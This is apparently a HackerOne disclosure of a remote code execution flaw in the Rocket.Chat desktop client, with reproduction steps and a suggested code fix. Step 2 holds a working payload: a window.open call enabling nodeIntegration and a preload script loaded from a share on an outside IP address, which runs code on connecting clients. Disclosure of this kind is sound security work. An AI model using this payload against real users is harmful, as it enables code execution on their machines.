Rocket.Chat: Remote Code Execution in Rocket.Chat-Desktop

2020-07-27T12:00:29
ID H1:943725
Type hackerone
Reporter sectex
Modified 2020-11-07T14:40:26

Description

Description: Rocket.Chat-Desktop is vulnerable to remote code execution. An attacker is able to create new BrowserWindow instances with a malicious preload script.

Releases Affected:

  • Rocket.Chat-Desktop-Client: < v3.0.0-develop

Steps To Reproduce (by setting up a malicious server):

  1. Go to Administration » Layout » Custom Scripts » Custom Script for Logged In Users
  2. Insert the following script: window.open('data:text/html,&lt;h1&gt;PWNED&lt;/h1&gt;', '', ['nodeIntegration=true', 'preload=\\\\45.155.173.235\\data\\cmd.js'].join(','))
  3. Click Save changes
  4. Open Rocket.Chat-Desktop and connect to the server
  5. CMD.exe will pop up.

Suggested mitigation

  • src » preload » jitsi.js ``` const wrapWindowOpen = (defaultWindowOpen) => (href, frameName, features) => { const settings = getSettings();

    features = ''; // <- should fix it

    if (settings && url.parse(href).host === settings.get('Jitsi_Domain')) { features = [ features, 'nodeIntegration=true', preload=${${ remote.app.getAppPath() }/app/preload.js}, ].join(','); }

    return defaultWindowOpen.call(window, href, frameName, features); }; ```

Impact

Remote Code Execution in Rocket.Chat-Desktop